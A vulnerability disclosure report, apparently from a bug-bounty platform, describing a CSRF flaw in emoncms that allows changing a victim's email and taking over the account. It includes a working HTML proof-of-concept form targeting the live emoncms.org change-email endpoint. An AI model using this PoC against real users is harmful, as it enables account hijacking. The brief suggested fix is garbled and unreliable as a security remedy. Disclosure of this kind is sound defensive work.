Improper Authorization in Handler for Custom URL Scheme in emoncms/emoncms
Valid
Reported on
Jul 15th 2021
✍️ Description
In CSRF attack if attacker able to change the victim email then attacker can change email to own email and get password from password reset section and then the account take over happen here.
🕵️♂️ Proof of Concept
1.you login in your account 2.you make a file contain the following html file. 3.client should open html ( as victim site) 4.Email going to be changed after click the "Submit request"
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://emoncms.org/user/changeemail.json">
<input type="hidden" name="email" value="victim@mail.com" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
💥 Impact
the attacker can take full control of victim account
Fix
you can set cookies on a custom header. this is a fastest way that you can protect your users